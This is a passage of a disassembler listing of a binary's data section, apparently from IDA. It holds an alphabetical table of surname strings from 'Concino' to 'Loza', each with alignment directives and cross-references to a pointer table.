aConcino db 'Concino',0 ; DATA XREF: .data:00444770�o
aCondodina db 'Condodina',0 ; DATA XREF: .data:00444774�o
align 4
aConnors db 'Connors',0 ; DATA XREF: .data:00444778�o
aCorey db 'Corey',0 ; DATA XREF: .data:0044477C�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: .data:00444780�o
aCosmides db 'Cosmides',0 ; DATA XREF: .data:00444784�o
align 10h
aCounter db 'Counter',0 ; DATA XREF: .data:00444788�o
aCoutaux db 'Coutaux',0 ; DATA XREF: .data:0044478C�o
aCrawford db 'Crawford',0 ; DATA XREF: .data:00444790�o
align 4
aCrocker db 'Crocker',0 ; DATA XREF: .data:00444794�o
aCroshaw db 'Croshaw',0 ; DATA XREF: .data:00444798�o
aCroxen db 'Croxen',0 ; DATA XREF: .data:0044479C�o
align 4
aCroxton db 'Croxton',0 ; DATA XREF: .data:004447A0�o
aCui db 'Cui',0 ; DATA XREF: .data:004447A4�o
aCurrier db 'Currier',0 ; DATA XREF: .data:004447A8�o
aCutler db 'Cutler',0 ; DATA XREF: .data:004447AC�o
align 10h
aCvek db 'Cvek',0 ; DATA XREF: .data:004447B0�o
align 4
aCyders db 'Cyders',0 ; DATA XREF: .data:004447B4�o
align 10h
aDasilva db 'daSilva',0 ; DATA XREF: .data:004447B8�o
aDaldalian db 'Daldalian',0 ; DATA XREF: .data:004447BC�o
align 4
aDaly db 'Daly',0 ; DATA XREF: .data:004447C0�o
align 4
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: .data:004447C4�o
aDanieli db 'Danieli',0 ; DATA XREF: .data:004447C8�o
aDante db 'Dante',0 ; DATA XREF: .data:004447CC�o
align 4
aDapice db 'Dapice',0 ; DATA XREF: .data:004447D0�o
align 4
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: .data:004447D4�o
aDas db 'Das',0 ; DATA XREF: .data:004447D8�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: .data:004447DC�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: .data:004447E0�o
aDavid db 'David',0 ; DATA XREF: .data:004447E4�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: .data:004447E8�o
aDegennaro db 'DeGennaro',0 ; DATA XREF: .data:004447EC�o
align 4
aDelapena db 'DeLaPena',0 ; DATA XREF: .data:004447F0�o
align 4
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: .data:004447F4�o
align 4
aDerousse db 'deRousse',0 ; DATA XREF: .data:004447F8�o
align 10h
aDebroff db 'Debroff',0 ; DATA XREF: .data:004447FC�o
aDees db 'Dees',0 ; DATA XREF: .data:00444800�o
align 10h
aDefeciani db 'Defeciani',0 ; DATA XREF: .data:00444804�o
align 4
aDelattre db 'Delattre',0 ; DATA XREF: .data:00444808�o
align 4
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: .data:0044480C�o
align 4
aDelger db 'Delger',0 ; DATA XREF: .data:00444810�o
align 10h
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: .data:00444814�o
align 4
aDeming db 'Deming',0 ; DATA XREF: .data:00444818�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: .data:0044481C�o
align 10h
aDemusz db 'Demusz',0 ; DATA XREF: .data:00444820�o
align 4
aDenault db 'Denault',0 ; DATA XREF: .data:00444824�o
aDenham db 'Denham',0 ; DATA XREF: .data:00444828�o
align 4
aDenison db 'Denison',0 ; DATA XREF: .data:0044482C�o
aDesombre db 'Desombre',0 ; DATA XREF: .data:00444830�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: .data:00444834�o
aDFini db 'D',27h,'fini',0 ; DATA XREF: .data:00444838�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: .data:0044483C�o
align 4
aDiefenbach db 'Diefenbach',0 ; DATA XREF: .data:00444840�o
align 10h
aDifabio db 'Difabio',0 ; DATA XREF: .data:00444844�o
aDifronzo db 'Difronzo',0 ; DATA XREF: .data:00444848�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: .data:0044484C�o
align 10h
aDionysius db 'Dionysius',0 ; DATA XREF: .data:00444850�o
align 4
aDirksen db 'Dirksen',0 ; DATA XREF: .data:00444854�o
aDockery db 'Dockery',0 ; DATA XREF: .data:00444858�o
aDoherty db 'Doherty',0 ; DATA XREF: .data:0044485C�o
aDonahue db 'Donahue',0 ; DATA XREF: .data:00444860�o
aDonner db 'Donner',0 ; DATA XREF: .data:00444864�o
align 4
aDoonan db 'Doonan',0 ; DATA XREF: .data:00444868�o
align 4
aDore db 'Dore',0 ; DATA XREF: .data:0044486C�o
align 4
aDorf db 'Dorf',0 ; DATA XREF: .data:00444870�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: .data:00444874�o
align 4
aDoty db 'Doty',0 ; DATA XREF: .data:00444878�o
align 4
aDoug db 'Doug',0 ; DATA XREF: .data:0044487C�o
align 4
aDowsland db 'Dowsland',0 ; DATA XREF: .data:00444880�o
align 10h
aDrinker db 'Drinker',0 ; DATA XREF: .data:00444884�o
aDSouza db 'D',27h,'souza',0 ; DATA XREF: .data:00444888�o
aDuffin db 'Duffin',0 ; DATA XREF: .data:0044488C�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: .data:00444890�o
aDussault db 'Dussault',0 ; DATA XREF: .data:00444894�o
align 4
aDwyer db 'Dwyer',0 ; DATA XREF: .data:00444898�o
align 4
aEardley db 'Eardley',0 ; DATA XREF: .data:0044489C�o
aEbeling db 'Ebeling',0 ; DATA XREF: .data:004448A0�o
aEckel db 'Eckel',0 ; DATA XREF: .data:004448A4�o
align 4
aEdley db 'Edley',0 ; DATA XREF: .data:004448A8�o
align 4
aEdner db 'Edner',0 ; DATA XREF: .data:004448AC�o
align 4
aEdward db 'Edward',0 ; DATA XREF: .data:004448B0�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: .data:004448B4�o
aEliasson db 'Eliasson',0 ; DATA XREF: .data:004448B8�o
align 4
aElmendorf db 'Elmendorf',0 ; DATA XREF: .data:004448BC�o
align 4
aElmerick db 'Elmerick',0 ; DATA XREF: .data:004448C0�o
align 4
aElvis db 'Elvis',0 ; DATA XREF: .data:004448C4�o
align 4
aEncinas db 'Encinas',0 ; DATA XREF: .data:004448C8�o
aEnyeart db 'Enyeart',0 ; DATA XREF: .data:004448CC�o
aEppling db 'Eppling',0 ; DATA XREF: .data:004448D0�o
aErbach db 'Erbach',0 ; DATA XREF: .data:004448D4�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: .data:004448D8�o
align 4
aErdos db 'Erdos',0 ; DATA XREF: .data:004448DC�o
align 4
aErez db 'Erez',0 ; DATA XREF: .data:004448E0�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: .data:004448E4�o
align 10h
aEstes db 'Estes',0 ; DATA XREF: .data:004448E8�o
align 4
aEtter db 'Etter',0 ; DATA XREF: .data:004448EC�o
align 10h
aEuripides db 'Euripides',0 ; DATA XREF: .data:004448F0�o
align 4
aEverett db 'Everett',0 ; DATA XREF: .data:004448F4�o
aFabbris db 'Fabbris',0 ; DATA XREF: .data:004448F8�o
aFagan db 'Fagan',0 ; DATA XREF: .data:004448FC�o
align 4
aFaioes db 'Faioes',0 ; DATA XREF: .data:00444900�o
align 4
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: .data:00444904�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: .data:00444908�o
aFaris db 'Faris',0 ; DATA XREF: .data:0044490C�o
align 4
aFarone db 'Farone',0 ; DATA XREF: .data:00444910�o
align 4
aFarren db 'Farren',0 ; DATA XREF: .data:00444914�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: .data:00444918�o
align 4
aFates db 'Fates',0 ; DATA XREF: .data:0044491C�o
align 4
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: .data:00444920�o
align 4
aFejzo db 'Fejzo',0 ; DATA XREF: .data:00444924�o
align 10h
aFeldman db 'Feldman',0 ; DATA XREF: .data:00444928�o
aFernald db 'Fernald',0 ; DATA XREF: .data:0044492C�o
aFernandes db 'Fernandes',0 ; DATA XREF: .data:00444930�o
align 4
aFerrante db 'Ferrante',0 ; DATA XREF: .data:00444934�o
align 4
aFerriell db 'Ferriell',0 ; DATA XREF: .data:00444938�o
align 4
aFeuer db 'Feuer',0 ; DATA XREF: .data:0044493C�o
align 4
aFido db 'Fido',0 ; DATA XREF: .data:00444940�o
align 4
aField db 'Field',0 ; DATA XREF: .data:00444944�o
align 4
aFink db 'Fink',0 ; DATA XREF: .data:00444948�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: .data:0044494C�o
aFinnegan db 'Finnegan',0 ; DATA XREF: .data:00444950�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: .data:00444954�o
aFisk db 'Fisk',0 ; DATA XREF: .data:00444958�o
align 4
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: .data:0044495C�o
aFlier db 'Flier',0 ; DATA XREF: .data:00444960�o
align 10h
aFlores db 'Flores',0 ; DATA XREF: .data:00444964�o
align 4
aFolks db 'Folks',0 ; DATA XREF: .data:00444968�o
align 10h
aForester db 'Forester',0 ; DATA XREF: .data:0044496C�o
align 4
aFortes db 'Fortes',0 ; DATA XREF: .data:00444970�o
align 4
aFortier db 'Fortier',0 ; DATA XREF: .data:00444974�o
aFossey db 'Fossey',0 ; DATA XREF: .data:00444978�o
align 4
aFossi db 'Fossi',0 ; DATA XREF: .data:0044497C�o
align 4
aFrancisco db 'Francisco',0 ; DATA XREF: .data:00444980�o
align 4
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: .data:00444984�o
align 4
aFranz db 'Franz',0 ; DATA XREF: .data:00444988�o
align 10h
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: .data:0044498C�o
align 10h
aFreid db 'Freid',0 ; DATA XREF: .data:00444990�o
align 4
aFreundlich db 'Freundlich',0 ; DATA XREF: .data:00444994�o
align 4
aFried db 'Fried',0 ; DATA XREF: .data:00444998�o
align 4
aFriedland db 'Friedland',0 ; DATA XREF: .data:0044499C�o
align 4
aFrisken db 'Frisken',0 ; DATA XREF: .data:004449A0�o
aFrowiss db 'Frowiss',0 ; DATA XREF: .data:004449A4�o
aFryberger db 'Fryberger',0 ; DATA XREF: .data:004449A8�o
align 4
aFrye db 'Frye',0 ; DATA XREF: .data:004449AC�o
align 4
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: .data:004449B0�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: .data:004449B4�o
align 10h
aFurth db 'Furth',0 ; DATA XREF: .data:004449B8�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: .data:004449BC�o
align 10h
aGabrielli db 'Gabrielli',0 ; DATA XREF: .data:004449C0�o
align 4
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: .data:004449C4�o
align 4
aGaleotti db 'Galeotti',0 ; DATA XREF: .data:004449C8�o
align 4
aGalwey db 'Galwey',0 ; DATA XREF: .data:004449CC�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: .data:004449D0�o
aGarfield db 'Garfield',0 ; DATA XREF: .data:004449D4�o
align 10h
aGarman db 'Garman',0 ; DATA XREF: .data:004449D8�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: .data:004449DC�o
aGeller db 'Geller',0 ; DATA XREF: .data:004449E0�o
align 4
aGemberling db 'Gemberling',0 ; DATA XREF: .data:004449E4�o
align 4
aGeorgi db 'Georgi',0 ; DATA XREF: .data:004449E8�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: .data:004449EC�o
aGhorai db 'Ghorai',0 ; DATA XREF: .data:004449F0�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: .data:004449F4�o
aGibson db 'Gibson',0 ; DATA XREF: .data:004449F8�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: .data:004449FC�o
aGili db 'Gili',0 ; DATA XREF: .data:00444A00�o
align 4
aGill db 'Gill',0 ; DATA XREF: .data:00444A04�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: .data:00444A08�o
align 10h
aGist db 'Gist',0 ; DATA XREF: .data:00444A0C�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: .data:00444A10�o
aGlegg db 'Glegg',0 ; DATA XREF: .data:00444A14�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: .data:00444A18�o
aGoldfarb db 'Goldfarb',0 ; DATA XREF: .data:00444A1C�o
align 4
aGoncalves db 'Goncalves',0 ; DATA XREF: .data:00444A20�o
align 4
aGood db 'Good',0 ; DATA XREF: .data:00444A24�o
align 10h
aGoodearl db 'Goodearl',0 ; DATA XREF: .data:00444A28�o
align 4
aGoody db 'Goody',0 ; DATA XREF: .data:00444A2C�o
align 4
aGozzi db 'Gozzi',0 ; DATA XREF: .data:00444A30�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: .data:00444A34�o
aGreenberg db 'Greenberg',0 ; DATA XREF: .data:00444A38�o
align 10h
aGreenfeld db 'Greenfeld',0 ; DATA XREF: .data:00444A3C�o
align 4
aGriffiths db 'Griffiths',0 ; DATA XREF: .data:00444A40�o
align 4
aGrigoletto db 'Grigoletto',0 ; DATA XREF: .data:00444A44�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: .data:00444A48�o
align 10h
aGruner db 'Gruner',0 ; DATA XREF: .data:00444A4C�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: .data:00444A50�o
align 10h
aGuenthart db 'Guenthart',0 ; DATA XREF: .data:00444A54�o
align 4
aGunn db 'Gunn',0 ; DATA XREF: .data:00444A58�o
align 4
aGuo db 'Guo',0 ; DATA XREF: .data:00444A5C�o
aHa db 'Ha',0 ; DATA XREF: .data:00444A60�o
align 4
aHaar db 'Haar',0 ; DATA XREF: .data:00444A64�o
align 4
aHackman db 'Hackman',0 ; DATA XREF: .data:00444A68�o
aHackshaw db 'Hackshaw',0 ; DATA XREF: .data:00444A6C�o
align 4
aHaley db 'Haley',0 ; DATA XREF: .data:00444A70�o
align 10h
aHalkias db 'Halkias',0 ; DATA XREF: .data:00444A74�o
aHallowell db 'Hallowell',0 ; DATA XREF: .data:00444A78�o
align 4
aHalpert db 'Halpert',0 ; DATA XREF: .data:00444A7C�o
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: .data:00444A80�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: .data:00444A84�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: .data:00444A88�o
align 10h
aHand db 'Hand',0 ; DATA XREF: .data:00444A8C�o
align 4
aHanssen db 'Hanssen',0 ; DATA XREF: .data:00444A90�o
aHarding db 'Harding',0 ; DATA XREF: .data:00444A94�o
aHargraves db 'Hargraves',0 ; DATA XREF: .data:00444A98�o
align 4
aHarlow db 'Harlow',0 ; DATA XREF: .data:00444A9C�o
align 4
aHarrigan db 'Harrigan',0 ; DATA XREF: .data:00444AA0�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: .data:00444AA4�o
aHartmann db 'Hartmann',0 ; DATA XREF: .data:00444AA8�o
align 4
aHartnett db 'Hartnett',0 ; DATA XREF: .data:00444AAC�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: .data:00444AB0�o
aHaviaras db 'Haviaras',0 ; DATA XREF: .data:00444AB4�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: .data:00444AB8�o
align 4
aHayes db 'Hayes',0 ; DATA XREF: .data:00444ABC�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: .data:00444AC0�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: .data:00444AC4�o
align 10h
aHeermans db 'Heermans',0 ; DATA XREF: .data:00444AC8�o
align 4
aHeft db 'Heft',0 ; DATA XREF: .data:00444ACC�o
align 4
aHeiland db 'Heiland',0 ; DATA XREF: .data:00444AD0�o
aHellman db 'Hellman',0 ; DATA XREF: .data:00444AD4�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: .data:00444AD8�o
align 10h
aHelprin db 'Helprin',0 ; DATA XREF: .data:00444ADC�o
aHemphill db 'Hemphill',0 ; DATA XREF: .data:00444AE0�o
align 4
aHenery db 'Henery',0 ; DATA XREF: .data:00444AE4�o
align 4
aHenrichs db 'Henrichs',0 ; DATA XREF: .data:00444AE8�o
align 4
aHernandez db 'Hernandez',0 ; DATA XREF: .data:00444AEC�o
align 4
aHerrera db 'Herrera',0 ; DATA XREF: .data:00444AF0�o
aHester db 'Hester',0 ; DATA XREF: .data:00444AF4�o
align 4
aHeubert db 'Heubert',0 ; DATA XREF: .data:00444AF8�o
aHeyeck db 'Heyeck',0 ; DATA XREF: .data:00444AFC�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: .data:00444B00�o
align 10h
aHind db 'Hind',0 ; DATA XREF: .data:00444B04�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: .data:00444B08�o
align 10h
aHitchcock db 'Hitchcock',0 ; DATA XREF: .data:00444B0C�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: .data:00444B10�o
align 4
aHock db 'Hock',0 ; DATA XREF: .data:00444B14�o
align 4
aHoffer db 'Hoffer',0 ; DATA XREF: .data:00444B18�o
align 4
aHoffman db 'Hoffman',0 ; DATA XREF: .data:00444B1C�o
aHokanson db 'Hokanson',0 ; DATA XREF: .data:00444B20�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: .data:00444B24�o
align 10h
aHolmes db 'Holmes',0 ; DATA XREF: .data:00444B28�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: .data:00444B2C�o
aHolter db 'Holter',0 ; DATA XREF: .data:00444B30�o
align 4
aHolway db 'Holway',0 ; DATA XREF: .data:00444B34�o
align 10h
aHolzman db 'Holzman',0 ; DATA XREF: .data:00444B38�o
aHooker db 'Hooker',0 ; DATA XREF: .data:00444B3C�o
align 10h
aHopkins db 'Hopkins',0 ; DATA XREF: .data:00444B40�o
aHorsley db 'Horsley',0 ; DATA XREF: .data:00444B44�o
aHoshida db 'Hoshida',0 ; DATA XREF: .data:00444B48�o
aHostage db 'Hostage',0 ; DATA XREF: .data:00444B4C�o
aHottle db 'Hottle',0 ; DATA XREF: .data:00444B50�o
align 4
aHoward db 'Howard',0 ; DATA XREF: .data:00444B54�o
align 10h
aHoy db 'Hoy',0 ; DATA XREF: .data:00444B58�o
aHuey db 'Huey',0 ; DATA XREF: .data:00444B5C�o
align 4
aHuidekoper db 'Huidekoper',0 ; DATA XREF: .data:00444B60�o
align 4
aHungerford db 'Hungerford',0 ; DATA XREF: .data:00444B64�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: .data:00444B68�o
align 10h
aHupp db 'Hupp',0 ; DATA XREF: .data:00444B6C�o
align 4
aHurtubise db 'Hurtubise',0 ; DATA XREF: .data:00444B70�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: .data:00444B74�o
align 10h
aHyde db 'Hyde',0 ; DATA XREF: .data:00444B78�o
align 4
aIaquinta db 'Iaquinta',0 ; DATA XREF: .data:00444B7C�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: .data:00444B80�o
align 10h
aIgarashi db 'Igarashi',0 ; DATA XREF: .data:00444B84�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: .data:00444B88�o
aInniss db 'Inniss',0 ; DATA XREF: .data:00444B8C�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: .data:00444B90�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: .data:00444B94�o
align 10h
aIsbill db 'Isbill',0 ; DATA XREF: .data:00444B98�o
align 4
aIsserman db 'Isserman',0 ; DATA XREF: .data:00444B9C�o
align 4
aIyer db 'Iyer',0 ; DATA XREF: .data:00444BA0�o
align 4
aJacenko db 'Jacenko',0 ; DATA XREF: .data:00444BA4�o
aJackson db 'Jackson',0 ; DATA XREF: .data:00444BA8�o
aJagers db 'Jagers',0 ; DATA XREF: .data:00444BAC�o
align 4
aJagger db 'Jagger',0 ; DATA XREF: .data:00444BB0�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: .data:00444BB4�o
align 4
aJain db 'Jain',0 ; DATA XREF: .data:00444BB8�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: .data:00444BBC�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: .data:00444BC0�o
align 10h
aJarnagin db 'Jarnagin',0 ; DATA XREF: .data:00444BC4�o
align 4
aJarrell db 'Jarrell',0 ; DATA XREF: .data:00444BC8�o
aJay db 'Jay',0 ; DATA XREF: .data:00444BCC�o
aJeffers db 'Jeffers',0 ; DATA XREF: .data:00444BD0�o
aJellis db 'Jellis',0 ; DATA XREF: .data:00444BD4�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: .data:00444BD8�o
aJespersen db 'Jespersen',0 ; DATA XREF: .data:00444BDC�o
align 4
aJewett db 'Jewett',0 ; DATA XREF: .data:00444BE0�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: .data:00444BE4�o
aJohannsen db 'Johannsen',0 ; DATA XREF: .data:00444BE8�o
align 4
aJohns db 'Johns',0 ; DATA XREF: .data:00444BEC�o
align 4
aJolly db 'Jolly',0 ; DATA XREF: .data:00444BF0�o
align 4
aJorgensen db 'Jorgensen',0 ; DATA XREF: .data:00444BF4�o
align 4
aJucks db 'Jucks',0 ; DATA XREF: .data:00444BF8�o
align 10h
aJuliano db 'Juliano',0 ; DATA XREF: .data:00444BFC�o
aJulious db 'Julious',0 ; DATA XREF: .data:00444C00�o
aKabbash db 'Kabbash',0 ; DATA XREF: .data:00444C04�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: .data:00444C08�o
align 4
aKafadar db 'Kafadar',0 ; DATA XREF: .data:00444C0C�o
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: .data:00444C10�o
aKaligian db 'Kaligian',0 ; DATA XREF: .data:00444C14�o
align 4
aKalil db 'Kalil',0 ; DATA XREF: .data:00444C18�o
align 4
aKalinowski db 'Kalinowski',0 ; DATA XREF: .data:00444C1C�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: .data:00444C20�o
align 10h
aKamel db 'Kamel',0 ; DATA XREF: .data:00444C24�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: .data:00444C28�o
align 10h
aKarpouzes db 'Karpouzes',0 ; DATA XREF: .data:00444C2C�o
align 4
aKassower db 'Kassower',0 ; DATA XREF: .data:00444C30�o
align 4
aKasten db 'Kasten',0 ; DATA XREF: .data:00444C34�o
align 10h
aKawachi db 'Kawachi',0 ; DATA XREF: .data:00444C38�o
aKee db 'Kee',0 ; DATA XREF: .data:00444C3C�o
aKeenan db 'Keenan',0 ; DATA XREF: .data:00444C40�o
align 4
aKeepper db 'Keepper',0 ; DATA XREF: .data:00444C44�o
aKeith db 'Keith',0 ; DATA XREF: .data:00444C48�o
align 4
aKelker db 'Kelker',0 ; DATA XREF: .data:off_444C4C�o
align 4
aKelsey db 'Kelsey',0 ; DATA XREF: .data:00444C50�o
align 4
aKempton db 'Kempton',0 ; DATA XREF: .data:00444C54�o
aKemsley db 'Kemsley',0 ; DATA XREF: .data:00444C58�o
aKendall db 'Kendall',0 ; DATA XREF: .data:00444C5C�o
aKerry db 'Kerry',0 ; DATA XREF: .data:00444C60�o
align 4
aKeul db 'Keul',0 ; DATA XREF: .data:00444C64�o
align 4
aKhong db 'Khong',0 ; DATA XREF: .data:00444C68�o
align 4
aKimmel db 'Kimmel',0 ; DATA XREF: .data:00444C6C�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: .data:00444C70�o
aKimura db 'Kimura',0 ; DATA XREF: .data:00444C74�o
align 4
aKindall db 'Kindall',0 ; DATA XREF: .data:00444C78�o
aKinsley db 'Kinsley',0 ; DATA XREF: .data:00444C7C�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: .data:00444C80�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: .data:00444C84�o
aKittridge db 'Kittridge',0 ; DATA XREF: .data:00444C88�o
align 10h
aKleckner db 'Kleckner',0 ; DATA XREF: .data:00444C8C�o
align 4
aKleiman db 'Kleiman',0 ; DATA XREF: .data:00444C90�o
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: .data:00444C94�o
aKlemperer db 'Klemperer',0 ; DATA XREF: .data:00444C98�o
align 4
aKling db 'Kling',0 ; DATA XREF: .data:00444C9C�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: .data:00444CA0�o
aKlint db 'Klint',0 ; DATA XREF: .data:00444CA4�o
align 4
aKnuff db 'Knuff',0 ; DATA XREF: .data:00444CA8�o
align 10h
aKobrick db 'Kobrick',0 ; DATA XREF: .data:00444CAC�o
aKoch db 'Koch',0 ; DATA XREF: .data:00444CB0�o
align 10h
aKohn db 'Kohn',0 ; DATA XREF: .data:00444CB4�o
align 4
aKoivumaki db 'Koivumaki',0 ; DATA XREF: .data:00444CB8�o
align 4
aKommer db 'Kommer',0 ; DATA XREF: .data:00444CBC�o
align 4
aKoniaris db 'Koniaris',0 ; DATA XREF: .data:00444CC0�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: .data:00444CC4�o
align 10h
aKool db 'Kool',0 ; DATA XREF: .data:00444CC8�o
align 4
aKorzybski db 'Korzybski',0 ; DATA XREF: .data:00444CCC�o
align 4
aKotter db 'Kotter',0 ; DATA XREF: .data:00444CD0�o
align 4
aKovaks db 'Kovaks',0 ; DATA XREF: .data:00444CD4�o
align 4
aKraemer db 'Kraemer',0 ; DATA XREF: .data:00444CD8�o
aKrailo db 'Krailo',0 ; DATA XREF: .data:00444CDC�o
align 4
aKrasney db 'Krasney',0 ; DATA XREF: .data:00444CE0�o
aKraus db 'Kraus',0 ; DATA XREF: .data:00444CE4�o
align 4
aKroemer db 'Kroemer',0 ; DATA XREF: .data:00444CE8�o
aKrysiak db 'Krysiak',0 ; DATA XREF: .data:00444CEC�o
aKuenzli db 'Kuenzli',0 ; DATA XREF: .data:00444CF0�o
aKumar db 'Kumar',0 ; DATA XREF: .data:00444CF4�o
align 4
aKusman db 'Kusman',0 ; DATA XREF: .data:00444CF8�o
align 4
aKuwabara db 'Kuwabara',0 ; DATA XREF: .data:00444CFC�o
align 4
aLa db 'La',0 ; DATA XREF: .data:00444D00�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: .data:00444D04�o
aLafler db 'Lafler',0 ; DATA XREF: .data:00444D08�o
align 4
aLaing db 'Laing',0 ; DATA XREF: .data:00444D0C�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: .data:00444D10�o
align 10h
aLandes db 'Landes',0 ; DATA XREF: .data:00444D14�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: .data:00444D18�o
align 10h
aLantieri db 'Lantieri',0 ; DATA XREF: .data:00444D1C�o
align 4
aLanzit db 'Lanzit',0 ; DATA XREF: .data:00444D20�o
align 4
aLaserna db 'Laserna',0 ; DATA XREF: .data:00444D24�o
aLashley db 'Lashley',0 ; DATA XREF: .data:00444D28�o
aLawless db 'Lawless',0 ; DATA XREF: .data:00444D2C�o
aLecar db 'Lecar',0 ; DATA XREF: .data:00444D30�o
align 4
aLecce db 'Lecce',0 ; DATA XREF: .data:00444D34�o
align 4
aLeclercq db 'Leclercq',0 ; DATA XREF: .data:00444D38�o
align 4
aLeite db 'Leite',0 ; DATA XREF: .data:00444D3C�o
align 10h
aLenard db 'Lenard',0 ; DATA XREF: .data:00444D40�o
align 4
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: .data:00444D44�o
align 4
aLesser db 'Lesser',0 ; DATA XREF: .data:00444D48�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: .data:00444D4C�o
align 4
aLiakos db 'Liakos',0 ; DATA XREF: .data:00444D50�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: .data:00444D54�o
align 4
aLiem db 'Liem',0 ; DATA XREF: .data:00444D58�o
align 4
aLight db 'Light',0 ; DATA XREF: .data:00444D5C�o
align 4
aLightfoot db 'Lightfoot',0 ; DATA XREF: .data:00444D60�o
align 10h
aLim db 'Lim',0 ; DATA XREF: .data:00444D64�o
aLinares db 'Linares',0 ; DATA XREF: .data:00444D68�o
aLinda db 'Linda',0 ; DATA XREF: .data:00444D6C�o
align 4
aLinder db 'Linder',0 ; DATA XREF: .data:00444D70�o
align 4
aLine_0 db 'Line',0 ; DATA XREF: .data:00444D74�o
align 4
aLinehan db 'Linehan',0 ; DATA XREF: .data:00444D78�o
aLinzee db 'Linzee',0 ; DATA XREF: .data:00444D7C�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: .data:00444D80�o
align 10h
aLipponen db 'Lipponen',0 ; DATA XREF: .data:00444D84�o
align 4
aLittle db 'Little',0 ; DATA XREF: .data:00444D88�o
align 4
aLitvak db 'Litvak',0 ; DATA XREF: .data:00444D8C�o
align 4
aLivernash db 'Livernash',0 ; DATA XREF: .data:00444D90�o
align 4
aLivi db 'Livi',0 ; DATA XREF: .data:00444D94�o
align 10h
aLivolsi db 'Livolsi',0 ; DATA XREF: .data:00444D98�o
aLizardo db 'Lizardo',0 ; DATA XREF: .data:00444D9C�o
aLocatelli db 'Locatelli',0 ; DATA XREF: .data:00444DA0�o
align 4
aLongworth db 'Longworth',0 ; DATA XREF: .data:00444DA4�o
align 4
aLoss db 'Loss',0 ; DATA XREF: .data:00444DA8�o
align 10h
aLoveman db 'Loveman',0 ; DATA XREF: .data:00444DAC�o
aLowenstein db 'Lowenstein',0 ; DATA XREF: .data:00444DB0�o
align 4
aLoza db 'Loza',0 ; DATA XREF: .data:00444DB4�o
align 4
